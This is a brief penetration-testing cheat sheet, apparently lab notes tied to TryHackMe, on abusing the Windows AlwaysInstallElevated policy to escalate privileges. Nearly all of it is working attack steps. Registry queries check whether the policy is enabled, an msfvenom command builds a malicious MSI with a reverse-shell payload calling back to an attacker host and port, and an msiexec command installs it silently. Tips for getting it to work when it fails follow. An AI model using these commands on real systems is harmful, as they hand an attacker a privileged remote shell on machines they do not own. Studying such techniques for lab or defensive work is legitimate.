AlwaysInstallElevated

Learn this on Try hack me platform

# If the value for both is 1, then it's exploitable
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

# Generate a malicious .msi and transfer to victim
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o evil.msi

# Put the file in C:\Windows\Temp
msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
# or try
evil.msi

# If doesn't work
-> Try a Different port like 21
-> Try Different Arch like x86 and x64
-> Try putting the file in tmp or the user's desktop

PreviousScheduled Tasks NextInsecure File permission

Last updated 1 year ago